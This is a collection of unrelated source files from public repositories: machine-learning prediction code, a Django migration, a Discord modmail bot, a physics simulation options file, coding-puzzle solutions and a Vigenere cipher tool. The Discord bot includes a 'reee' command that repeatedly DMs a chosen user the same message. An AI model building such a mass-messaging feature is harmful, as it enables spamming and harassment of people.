        :param kwargs: kwargs to be passed to the gating networks
            predict_mixing_probs() method.
        :returns: a batched Tensor with shape [..., num_test, 1, num_experts]
        """
        # Bug fix: the previous implementation evaluated the gating network
        # twice (the second call was also outside the name scope) and
        # discarded the first result. Evaluate once and return that value.
        with tf.name_scope("predict_mixing_probs") as scope:
            mixing_probs = self.gating_network.predict_mixing_probs(
                Xnew, **kwargs
            )
        return mixing_probs

    def predict_experts_dists(self, Xnew: InputData, **kwargs) -> tf.Tensor:
        """Calculates each experts predictive distribution at Xnew.

        :param Xnew: inputs with shape [num_test, input_dim]
        :param kwargs: kwargs to be passed to the experts
            predict_dists() method.
        :returns: a batched Tensor with shape [..., num_test, output_dim, num_experts]
        """
        with tf.name_scope("predict_experts_dists") as scope:
            dists = self.experts.predict_dists(Xnew, **kwargs)
        return dists

    def predict_y(self, Xnew: InputData, **kwargs) -> tfd.Distribution:
        """Predicts the mixture distribution at Xnew.

        :param Xnew: inputs with shape [num_test, input_dim]
        :param kwargs: kwargs to be passed to predict_mixing_probs and
            predict_experts_dists
        :returns: The prediction as a TensorFlow MixtureSameFamily distribution
        """
        # TODO should there be separate kwargs for gating and experts?
        mixing_probs = self.predict_mixing_probs(Xnew, **kwargs)
        dists = self.predict_experts_dists(Xnew, **kwargs)
        # Align the mixing probabilities with the experts' batch shape before
        # building the mixture (leftover debug prints removed from this path).
        if dists.batch_shape != tf.shape(mixing_probs):
            mixing_probs = tf.broadcast_to(mixing_probs, dists.batch_shape)
        tf.debugging.assert_equal(
            dists.batch_shape_tensor(),
            tf.shape(mixing_probs),
            message="Gating networks predict_mixing_probs(Xnew,...) and experts predict_dists(Xnew,...) dimensions do not match",
        )
        return tfd.MixtureSameFamily(
            mixture_distribution=tfd.Categorical(probs=mixing_probs),
            components_distribution=dists,
        )

    def predict_y_samples(
        self, Xnew: InputData, num_samples: int = 1, **kwargs
    ) -> tf.Tensor:
        """Returns samples from the predictive mixture distribution at Xnew.

        :param Xnew: inputs with shape [num_test, input_dim]
        :param num_samples: number of samples to draw
        :param kwargs: kwargs to be passed to predict_mixing_probs and
            predict_experts_dists
        :returns: a Tensor with shape [num_samples, num_test, output_dim]
        """
        return self.predict_y(Xnew, **kwargs).sample(num_samples)
| [
"scannell.aidan@gmail.com"
] | scannell.aidan@gmail.com |
3a04a77da2ee5df5107a7f1f4186b15aaa3400bd | ca08100b33a78c01bf49f097f4e80ed10e4ee9ad | /intrepidboats/apps/boats/migrations/0025_auto_20170518_1334.py | 4d0337d5918da1292d1f741df70a316bbba6feec | [] | no_license | elite0401/intrepidpowerboats | 347eae14b584d1be9a61ca14c014135ab0d14ad0 | d2a475b60d17aa078bf0feb5e0298c927e7362e7 | refs/heads/master | 2021-09-11T01:51:47.615117 | 2018-04-06T02:20:02 | 2018-04-06T02:20:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 567 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-05-18 17:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: constrains AboutTheBoatImage.kind to the
    # exterior/interior/cabin choice set. Do not edit by hand.
    dependencies = [
        ('boats', '0024_video_video_external_url'),
    ]
    operations = [
        migrations.AlterField(
            model_name='abouttheboatimage',
            name='kind',
            field=models.CharField(choices=[('EXTERIOR', 'exterior'), ('INTERIOR', 'interior'), ('CABIN', 'cabin')], max_length=25, verbose_name='kind'),
        ),
    ]
| [
"elite.wisdom@gmx.com"
] | elite.wisdom@gmx.com |
9952149d06ddc78f875ccee8e4e44294dddea96a | c3a3c8c242e968f185bc1e858dd3ad05d51f385a | /main.py | bbf618809419834b60c39ff41a20502e3f60fba2 | [] | no_license | oindrieel/Dwayne | cb5ac5a6617a7aff263c04f388cd64733960f661 | b87d7cb8f51f4f71257c9e6d90f72a44894f30fd | refs/heads/main | 2023-03-18T12:45:19.956260 | 2021-02-28T13:47:21 | 2021-02-28T13:47:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,522 | py | import asyncio
import discord
import os
import json
import sys
from discord import channel
from discord.ext import tasks
from discord.ext import commands
from asyncio import sleep
from discord.flags import Intents
from settings import *
from pretty_help import PrettyHelp, Navigation
# Bot core: "." command prefix, all gateway intents, pretty embedded help.
client = commands.Bot(command_prefix='.', intents=discord.Intents.all())
banner = ""
# nav = Navigation(":mag_right:", ":arrow_left:", ":arrow_right:")
color = discord.Color.purple()
client.help_command = PrettyHelp(color=color, active_time=15)
# Auto-load every cog module found in ./cogs (skipping the package marker).
for filename in os.listdir("./cogs"):
    if filename.endswith(".py") and filename != "__init__.py":
        client.load_extension(f'cogs.{filename[:-3]}')
        # Fix: report the extension that was actually loaded; the original
        # f-string contained no placeholder and always printed "(unknown)".
        print(f'Loaded {filename[:-3]}')
@client.event
async def on_ready():
    # Startup hook: advertise the "Listening to DM me for Help" presence,
    # then loop forever clearing the spam-detection scratch file every 10 s.
    await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name="DM me for Help"))
    print('Logged on as {0}!'.format(client.user))
    while True:
        await asyncio.sleep(10)
        # "r+" keeps the file in place; truncate(0) just empties it.
        with open("spam_detect.txt", "r+") as f:
            f.truncate(0)
# Location of the on-disk JSON configuration file.
CONFIG_PATH = "config.json"
# Template written on first run; the operator fills in the real values.
default_config = {
    "token": "[ add bot token here ]",
    "developers": [],
    "replacements": {},
    "prefix": "^",
    "mod_role": 0,
    "blacklist": [],
    "server": 0,
    "mail_channel": 0,
    "from_field": 1,
}
class ModmailBot(commands.Cog):
    # Relays DMs sent to the bot into a staff "mail" channel and lets
    # moderators answer from that channel (classic "modmail" pattern).
    # NOTE: command callbacks deliberately carry no docstrings -- discord.py
    # would surface them as help text and change the bot's help output.
    def __init__(self, bot, config):
        self.bot = bot
        self.config = config
        # Most recent correspondent; target of the .reply shortcut.
        self.last_user = None
    @commands.Cog.listener("on_ready")
    async def on_ready(self):
        print(f"Signed in as {self.bot.user} ({self.bot.user.id})")
    @commands.Cog.listener("on_message")
    async def on_message(self, message):
        # Forward an incoming DM to the configured mail channel as an embed.
        if not isinstance(message.channel, discord.DMChannel) or message.author.id == self.bot.user.id:
            # not a DM, or it's just the bot itself
            return
        channel = self.bot.get_channel(self.config["mail_channel"])
        if not channel:
            print("Mail channel not found! Reconfigure bot!")
        main_guild = self.bot.get_guild(self.config["server"])
        if not main_guild:
            print("Main Server ID is incorrect! Reconfigure bot!")
            author = message.author
        else:
            # Prefer the guild member object so nickname/colour are shown.
            author = main_guild.get_member(message.author.id)
            if not author:
                author = message.author
        content = message.clean_content
        embed = discord.Embed()
        embed.set_author(name="{} ({}#{})".format(author.display_name, author.name, author.discriminator),
                         icon_url=author.avatar_url)
        embed.timestamp = message.created_at
        embed.set_footer(text='User ID: {}'.format(author.id))
        embed.color = author.color
        # Embed field values are capped at 1024 chars; long text is split.
        embed.add_field(name="Message", value=content[:1000] or "blank")
        if len(content[1000:]) > 0:
            embed.add_field(name="(Continued)", value=content[1000:])
        await channel.send(content=f"{message.author.id}", embed=embed)
        try:
            await message.add_reaction('📬')
        except discord.ext.commands.errors.CommandInvokeError:
            await message.channel.send('📬')
        self.last_user = author
    async def _shutdown(self):
        # Log out and stop the event loop; shared by .shutdown and .restart.
        await self.bot.logout()
        await self.bot.close()
        self.bot.loop.stop()
    @commands.command()
    async def dm(self, ctx, user : discord.User, *, msg):
        # Moderator command: DM *msg* to *user*; only usable from the mail
        # channel.
        if ctx.channel.id != self.config["mail_channel"]:
            return
        main_guild = self.bot.get_guild(self.config["server"])
        if not main_guild:
            print("Main Server ID is incorrect! Reconfigure bot!")
            return ctx.send('Main Server Unavailable')
        else:
            # NOTE(review): reads the module-level `config` global here rather
            # than self.config -- confirm the asymmetry is intentional.
            if str(ctx.message.author.id) in config['replacements']:
                author = main_guild.get_member(config['replacements'][str(ctx.message.author.id)])
                if not author:
                    author = self.bot.user
                try:
                    await ctx.message.add_reaction('🔄')
                except:
                    await ctx.send('🔄')
            else:
                author = main_guild.get_member(ctx.message.author.id)
                if not author:
                    author = self.bot.user
        embed = discord.Embed()
        if self.config["from_field"]:
            embed.set_author(name="{} ({}#{})".format(author.display_name, author.name, author.discriminator),
                             icon_url=author.avatar_url)
        else:
            # Anonymous mode: brand the reply as a generic moderator response.
            embed.set_author(name="Moderator Response", icon_url=ctx.channel.guild.icon)
        embed.timestamp = ctx.message.created_at
        embed.color = author.color
        embed.add_field(name="Message", value=msg[:1000] or "blank", inline=False)
        if len(msg) > 1000:
            embed.add_field(name="(Continued)", value=msg[1000:], inline=False)
        if ctx.message.attachments:
            embed.add_field(name="Attachments", value=", ".join([i.url for i in ctx.message.attachments]))
        await user.send(embed=embed)
        try:
            await ctx.message.add_reaction('📬')
        except:
            await ctx.send('📬')
        self.last_user = user
    @commands.command(aliases=['r'])
    async def reply(self, ctx, *, msg):
        # Shortcut: DM the most recent correspondent without naming them.
        if self.last_user is None:
            await ctx.send("No user to reply to!")
            return
        await self.dm.callback(self, ctx, user=self.last_user, msg=msg)
    @commands.command()
    async def reee(self, ctx, user : discord.User, times : int, *, msg):
        # Developer-only: send *msg* to *user* `times` times, rate-limited.
        if ctx.author.id not in config["developers"]:
            return
        with ctx.typing():
            for i in range(times):
                if self.config["from_field"]:
                    await user.send(f"From {ctx.author.display_name}: {msg}")
                else:
                    await user.send(msg)
                await sleep(1.25)
        await ctx.message.add_reaction('📬')
    @commands.command()
    async def shutdown(self, ctx):
        # Developer-only: stop the bot process.
        if ctx.author.id not in config["developers"]:
            return
        await ctx.send('Shutting down...')
        await self._shutdown()
    @commands.command ()
    async def restart(self, ctx):
        # Developer-only: stop the bot, then re-exec this interpreter with the
        # same script/arguments so the process restarts in place.
        if ctx.author.id not in config["developers"]:
            return
        await ctx.send('Restarting...')
        await self._shutdown()
        script = sys.argv[0]
        if script.startswith(os.getcwd()):
            script = script[len(os.getcwd()):].lstrip(os.sep)
        if script.endswith('__main__.py'):
            # Script was launched as a package (`python -m pkg`); rebuild the
            # dotted module path for the re-exec.
            args = [sys.executable, '-m', script[:-len('__main__.py')].rstrip(os.sep).replace(os.sep, '.')]
        else:
            args = [sys.executable, script]
        os.execv(sys.executable, args + sys.argv[1:])
def write_config(config: dict):
    """Persist *config* to CONFIG_PATH as tab-indented JSON."""
    with open(CONFIG_PATH, "w") as fp:
        json.dump(config, fp, indent="\t")
def read_config():
    """Load and return the bot configuration from CONFIG_PATH."""
    with open(CONFIG_PATH) as fp:
        return json.load(fp)
# First run: write a template config and bail out so the operator can edit it.
if not os.path.exists(CONFIG_PATH):
    write_config(default_config)
    print("No config detected; a new one has been written! Please edit config.json then run the bot again.")
    sys.exit(1)
config = read_config()
client.add_cog(ModmailBot(client, config))
# NOTE(review): Discord_Token presumably comes from `from settings import *`
# rather than config["token"] -- confirm which source is authoritative.
client.run(Discord_Token)
| [
"noreply@github.com"
] | noreply@github.com |
ee4a8bd968583926c1ed2877ab805846d1966635 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/16144140.py | a395cacae7ac1620e027f02c873102b4b6342cf3 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/16144140.py generated: Wed, 25 Jan 2017 15:25:29
#
# Event Type: 16144140
#
# ASCII decay Descriptor: [Xi_b0 -> (Lambda0 -> p+ pi-) (J/psi(1S) -> mu+ mu-)]cc
#
from Configurables import Generation
Generation().EventType = 16144140
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Xib0_JpsiLambda,mm=phsp,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 5232,-5232 ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
dd399425d76c8de76f3f47e0e593e205cbf01591 | 9d4f68edfe2b68689f27fbf8d4601b5e759c9b07 | /new/algorithm11-maximum-69-number.py | daa8f0a4280549a816b92cf705a10f4430ec8412 | [] | no_license | javerthu/demo | 8cb9a7eadadde70c3117b2d598f47d4b977450d7 | 06335132e75c4df4ee2be535e255d9bc762e0087 | refs/heads/master | 2020-08-15T01:23:38.717143 | 2020-04-02T15:36:19 | 2020-04-02T15:36:19 | 215,259,562 | 2 | 0 | null | 2019-10-15T15:31:25 | 2019-10-15T09:29:38 | Python | UTF-8 | Python | false | false | 1,285 | py | '''
给你一个仅由数字 6 和 9 组成的正整数 num。
你最多只能翻转一位数字,将 6 变成 9,或者把 9 变成 6 。
请返回你可以得到的最大数字。
示例 1:
输入:num = 9669
输出:9969
解释:
改变第一位数字可以得到 6669 。
改变第二位数字可以得到 9969 。
改变第三位数字可以得到 9699 。
改变第四位数字可以得到 9666 。
其中最大的数字是 9969 。
示例 2:
输入:num = 9996
输出:9999
解释:将最后一位从 6 变到 9,其结果 9999 是最大的数。
示例 3:
输入:num = 9999
输出:9999
解释:无需改变就已经是最大的数字了。
提示:
1 <= num <= 10^4
num 每一位上的数字都是 6 或者 9 。
'''
num = eval(input('输入整数:'))
d = str(num)
if '6' not in d:
print(num)
else:
c = -1
for i in d:
c = c + 1
if int(i) == 6:
print(int(d[0:c] + '9' + d[c+1::]))
break
#letcode模板
# class Solution:
# def maximum69Number (self, num: int) -> int:
# d = str(num)
# if '6' not in d:
# return num
# c = -1
# for i in d:
# c = c + 1
# if int(i) == 6:
# return int(d[0:c] + '9' + d[c+1::]) | [
"867216905@qq.com"
] | 867216905@qq.com |
bea0b9d9c683356da4d5387f4f595bbf7741ff45 | 9f8c8dd70c4c5897cc48a57e04c47c607bce2fc4 | /break.py | ff69b6f8447c87474764f9a50f58cd5db40799a5 | [] | no_license | maghelu98/corso-udemy | 403ce1fc54463a756850b724c94803fc10becd0e | e7cee0bbe4a175e835aad8ca4811025e746ea580 | refs/heads/master | 2022-12-09T07:25:52.710290 | 2020-05-03T20:57:30 | 2020-05-03T20:57:30 | 137,659,935 | 0 | 0 | null | 2022-12-08T09:46:46 | 2018-06-17T14:11:47 | Python | UTF-8 | Python | false | false | 500 | py | delta = input("delta: ")
try:
for i in range(1,20):
try:
print("i = %d ..." % (i))
j = 1.0/(delta+10.0-i)
print("i =%d , j = %f " % (i,j))
except Exception as e:
print("prima di raise: {}, per i = {:d}".format(e, i))
raise
print("dopo di raise: {}, per i = {:d}".format(e,i))
break
print("programma completato")
except Exception as e:
print("programma in errore: {}".format(e))
raise
| [
"giovanni.pelosi@unimib.it"
] | giovanni.pelosi@unimib.it |
21e5ec7379ce378487962e49e3194e013cbf8211 | a7809b4619c6fd557c654d05a76498888e539e08 | /init_instance.py | e1e41e4e99a067976ea573f0c1ee2e45a16a921c | [] | no_license | kokubum/Data-Model | e6e2f2ba298c047040220a17bdc2034e182e4ccf | d4b4f5bdc9fb139526faffbc4b21af90f632aff6 | refs/heads/master | 2022-07-17T01:29:01.201970 | 2020-05-15T18:10:29 | 2020-05-15T18:10:29 | 264,260,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | class Test:
#The __new__ method is called by the Test.__class__.__call__(Test,*args,**kwargs)
def __new__(cls,*args,**kwargs):
print("Creating instance!")
#__new__ is responsible for creating the instance of the class Test wich will be used in __init__ constructor
#Starting from python 3.3+ we can't pass any extra arguments to the object if we are overriden the __init__ and __new__ method
instance = super().__new__(cls)
return instance
def __init__(self,num1,num2):
print("Initializing the attributes!")
self.sum = num1+num2
if __name__ == '__main__':
test = Test(10,15)
print("Sum Attribute: %d " %test.sum)
print('-------------------------------------------')
test2 = Test.__class__.__call__(Test,10,10)
print("Sum Attribute: %d " %test2.sum)
| [
"eskokubum@gmail.com"
] | eskokubum@gmail.com |
2bab2de433e731e2c1376160a0148c2a824ea777 | 46083e01408b6bb2e05f78a38f69fd5a6881a4c3 | /autotesting/test2/testcase/testbase.py | 1611bc6797907d0c433ece866a2067286b297c17 | [] | no_license | caixinshu/api | 7601ce97ed6666cbc5995ecd1e32165605a7da7e | b75bf1bdbf4ee14f0485d552ff2f382c7991821e | refs/heads/master | 2021-01-22T05:54:14.651098 | 2019-12-17T09:09:23 | 2019-12-17T09:19:26 | 81,718,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # -*- coding: utf-8 -*
import requests
from suds.client import Client
from config import url
from tools import readexceldata
#初始化url
class test:
def __init__(self,url,file,colnameindex,by_name):
self.url=url
self.file=file
self.colnameindex=colnameindex
self.by_name=by_name
def getclient(self):#生成客户端
client=Client(self.url)
return client
def getdata(self):#获得excel表单数据
data=readexceldata.excel_table_byname(self.file,self.colnameindex,self.by_name)
return data
def main():
test1=test(url.loginurl,"E:\\workspacepython\\apiteststudy\\data\\study.xls",0,"login")
print "111"
print test1.getdata()
if __name__=="__main__":
main()
| [
"651696408@qq.com"
] | 651696408@qq.com |
57d10fbb4204045209819083196a47597d5fb8d6 | ff580bee72f5c215b6b1d22315124db5a20696aa | /merge_sort.py | c27ea2aaf7ed9e439c86ffd8bad1dfbdb459ed94 | [] | no_license | raghavpatnecha/Fun_with_python | e10bcd7e824665cc1a83251602bae3682ced5c3f | 59165d166ced8e4d17307ec502972b13b362b8e2 | refs/heads/master | 2021-05-03T04:29:51.540465 | 2018-06-10T09:18:39 | 2018-06-10T09:18:39 | 120,617,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | def mergesort(mylist):
if len(mylist) >1:
mid = len(mylist)//2
lefthalf= mylist[:mid]
righthalf = mylist[mid:]
mergesort(lefthalf)
mergesort(righthalf)
i=0
j=0
k=0
while i < len(lefthalf) and j < len(righthalf):
if lefthalf[i] < righthalf[j]:
mylist[k] = lefthalf[i]
i += 1
else:
mylist[k]= righthalf[j]
j = j+1
k = k+1
while i < len(lefthalf):
mylist[k]= lefthalf[i]
i=i+1
k = k+1
while j < len(righthalf):
mylist[k] =righthalf[j]
j = j+1
k=k+1
mylist= [54,26,93,17,77,31,44,55,20]
mergesort(mylist)
print(mylist)
| [
"noreply@github.com"
] | noreply@github.com |
1d691134309a3252a7bb156b88d6ee3a5209797e | 39e75353e5539dfbaeb64d6437ceace2d2e02d2d | /VigenereCipher.py | 9b2b56b48b492453f36447a17153b58b26442bde | [] | no_license | the-bumblebee/vigenere-cipher | 900411733292169859a735ef37a8cdf97c71b1b3 | d0e370320a203fa8136e4080fe496431a0ab7b1a | refs/heads/master | 2020-04-23T11:42:24.609381 | 2019-02-21T16:47:32 | 2019-02-21T16:47:32 | 165,599,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py | import argparse
alph = list(map(chr, range(97, 123)))
def encrypt(message, key):
message = message.lower()
key = key.lower()
cipherText = ''
nonCount = 0
for i in range(len(message)):
if message[i] not in alph:
nonCount += 1
cipherText += message[i]
else:
cipherText += alph[(alph.index(key[(i - nonCount) % len(key)]) + alph.index(message[i]) ) % 26]
return cipherText
def decrypt(cipherText, key):
cipherText = cipherText.lower()
key = key.lower()
message = ''
nonCount = 0
for i in range(len(cipherText)):
if cipherText[i] not in alph:
nonCount += 1
message += cipherText[i]
else:
message += alph[(alph.index(cipherText[i]) - alph.index(key[(i - nonCount) % len(key)])) % 26]
return message
def main():
if args.encrypt_flag == None and args.message == None and args.key == None:
sel = input('Encrypt(1) or decrypt(2):')
if sel == '1':
message = input('Enter text to be encrypted:')
key = input('Enter key:')
print('Encrypted message:\n' + encrypt(message, key))
elif sel == '2':
message = input('Enter text to be decrypted:')
key = input('Enter key:')
print('Decrypted message:\n' + decrypt(message, key))
elif args.encrypt_flag == True and args.message != None and args.key != None:
message = args.message
key = args.key
print('Encrypted message:\n' + encrypt(message, key))
elif args.encrypt_flag == False and args.message != None and args.key != None:
message = args.message
key = args.key
print('Decrypted message:\n' + decrypt(message, key))
else:
parser.print_help()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', action = 'store_false', dest = 'encrypt_flag', default = None, help = 'decrypt message')
group.add_argument('-e', action='store_true', dest = 'encrypt_flag', help = 'encrypt message')
parser.add_argument('-m', '--message', help = 'message to be encrypted or decrypted')
parser.add_argument('-k', '--key', help = 'key used for encryption or decryption')
args = parser.parse_args()
main()
| [
"klmktu.asif@gmail.com"
] | klmktu.asif@gmail.com |
f0cc895a2f838da497f08e2940e7412d4b7b2cef | 77e1db762bd012e0447b8275df6e24012a3aa82f | /gas-station/gas-station.py | 2f97eebf9959f4a7592e2c8b22af1118397bc4c1 | [] | no_license | PigsGoMoo/LeetCode | 1e9d37507b04a238347bcc693e9be3d24313a46e | a5c9bc433ac6c54bebb83b9640273216512f41b8 | refs/heads/main | 2023-06-28T12:58:57.516464 | 2021-08-03T19:49:07 | 2021-08-03T19:49:07 | 362,915,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,426 | py | class Solution:
def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:
# [2, 2, 2, -3, -3]
# [1, 1, -1]
# DP solution? Make an array of differences between cost - gas for each index
# If that array sum is <= 0, then it's possible. If >= 1, then we cannot.
# Start would be at first negative index?
# [2, 2, -3, 2, -3] would start at 2?
# [1, 2, 3, 4, 5] - gas
# [3, 4, 0, 6, 2] - cost
# dp = [c - g for c, g in zip(cost, gas)]
dp = []
tot = 0
for idx, (c, g) in enumerate(zip(cost, gas)):
val = c - g
dp.append(val)
tot += val
# print(dp, tot, first)
if tot > 0:
return -1
else:
# [-1, 3, -1, 2, -3]
# Keep sum. If > 0, reset. Keep track of first neg
# If hit end of array and sum <= 0, return first neg
valid = 0
reset = True
last_neg = 0
for idx, num in enumerate(dp):
if num < 0 and reset:
valid += num
reset = False
last_neg = idx
else:
valid += num
if valid > 0:
reset = True
valid = 0
return last_neg
| [
"33019839+PigsGoMoo@users.noreply.github.com"
] | 33019839+PigsGoMoo@users.noreply.github.com |
e774d1201c6a3930755f808039578edf9f6144e7 | a6d7b74046a0da8bbae2cda7d4d34deabc581445 | /Game_Server/node_modules/uws/build/config.gypi | 87ebd561d683cb97597cc7b1aafabdd9024087b1 | [
"Zlib"
] | permissive | tztz8/TSA_Game | 9b3ab36bb7018553689565157880a816dd744d79 | baaba65abb18f6c21b7df1864f970ab428c768d3 | refs/heads/master | 2021-05-09T19:05:20.688409 | 2020-04-15T18:51:52 | 2020-04-15T18:51:52 | 118,629,385 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,409 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt58l.dat",
"icu_data_in": "..\\..\\deps/icu-small\\source/data/in\\icudt58l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "58",
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 48,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"node_use_v8_platform": "true",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "so.48",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_inspector": "true",
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\Timbre Freeman\\.node-gyp\\6.11.4",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"access": "",
"also": "",
"always_auth": "",
"bin_links": "true",
"browser": "",
"ca": "",
"cache": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm-cache",
"cache_lock_retries": "10",
"cache_lock_stale": "60000",
"cache_lock_wait": "10000",
"cache_max": "Infinity",
"cache_min": "10",
"cert": "",
"color": "true",
"depth": "Infinity",
"description": "true",
"dev": "",
"dry_run": "",
"editor": "notepad.exe",
"engine_strict": "",
"fetch_retries": "2",
"fetch_retry_factor": "10",
"fetch_retry_maxtimeout": "60000",
"fetch_retry_mintimeout": "10000",
"force": "",
"git": "git",
"git_tag_version": "true",
"global": "",
"globalconfig": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm\\etc\\npmrc",
"globalignorefile": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm\\etc\\npmignore",
"global_style": "",
"group": "",
"heading": "npm",
"https_proxy": "",
"if_present": "",
"ignore_scripts": "",
"init_author_email": "",
"init_author_name": "",
"init_author_url": "",
"init_license": "ISC",
"init_module": "C:\\Users\\Timbre Freeman\\.npm-init.js",
"init_version": "1.0.0",
"json": "",
"key": "",
"legacy_bundling": "",
"link": "",
"local_address": "",
"long": "",
"maxsockets": "50",
"message": "%s",
"node_version": "6.11.4",
"npat": "",
"onload_script": "",
"only": "",
"optional": "true",
"parseable": "",
"prefix": "C:\\Users\\Timbre Freeman\\AppData\\Roaming\\npm",
"production": "",
"progress": "true",
"proprietary_attribs": "true",
"rebuild_bundle": "true",
"registry": "https://registry.npmjs.org/",
"rollback": "true",
"save": "true",
"save_bundle": "",
"save_dev": "",
"save_exact": "",
"save_optional": "",
"save_prefix": "^",
"scope": "",
"searchexclude": "",
"searchopts": "",
"searchsort": "name",
"shell": "C:\\WINDOWS\\system32\\cmd.exe",
"shrinkwrap": "true",
"sign_git_tag": "",
"strict_ssl": "true",
"tag": "latest",
"tag_version_prefix": "v",
"tmp": "C:\\Users\\TIMBRE~1\\AppData\\Local\\Temp",
"umask": "0000",
"unicode": "",
"unsafe_perm": "true",
"usage": "",
"user": "",
"userconfig": "C:\\Users\\Timbre Freeman\\.npmrc",
"user_agent": "npm/3.10.10 node/v6.11.4 win32 x64",
"version": "",
"versions": "",
"viewer": "browser"
}
}
| [
"180427@cvsd356.org"
] | 180427@cvsd356.org |
433192fa2881cfd43a42000926be587693feb71b | 45b52a8019e9cd05b82e7a8393ef15a96bc9a2f3 | /src/ml/scale.py | 340adb1256d031d57c8420826a45a83e30d5ca38 | [] | no_license | adpartin/pdx-histo | be57fb9171b23fb0146d6e06caa5a7b442800698 | 52a6468034c1966e2d85024d863817804dcb387a | refs/heads/main | 2023-06-27T00:56:24.875604 | 2021-07-15T21:48:29 | 2021-07-15T21:48:29 | 317,675,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,683 | py | import sklearn
import numpy as np
import pandas as pd
# from sklearn.metrics import confusion_matrix
# from sklearn.metrics import ConfusionMatrixDisplay
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
# from sklearn.externals import joblib
# from math import sqrt
def scale_fea(xdata, scaler_name='stnd', dtype=np.float32, verbose=False):
""" Returns the scaled dataframe of features. """
if scaler_name is None:
if verbose:
print('Scaler is None (not scaling).')
return xdata
if scaler_name == 'stnd':
scaler = StandardScaler()
elif scaler_name == 'minmax':
scaler = MinMaxScaler()
elif scaler_name == 'rbst':
scaler = RobustScaler()
else:
print(f'The specified scaler {scaler_name} is not supported (not scaling).')
return xdata
cols = xdata.columns
return pd.DataFrame(scaler.fit_transform(xdata), columns=cols, dtype=dtype)
def get_scaler(fea_df, scaler_name: str="standard", print_fn=print):
""" Returns a sklearn scaler object. """
fea_df = fea_df.drop_duplicates().reset_index(drop=True)
if fea_df.shape[0] == 0:
# TODO: add warning!
return None
if scaler_name == "standard":
scaler = sklearn.preprocessing.StandardScaler()
elif scaler_name == "minmax":
scaler = sklearn.preprocessing.MinMaxScaler()
elif scaler_name == "robust":
scaler = sklearn.preprocessing.RobustScaler()
else:
print_fn(f"The specified scaler {scaler_name} is not supported (not scaling).")
return None
# scaler = StandardScaler()
scaler.fit(fea_df)
return scaler
| [
"25892264+adpartin@users.noreply.github.com"
] | 25892264+adpartin@users.noreply.github.com |
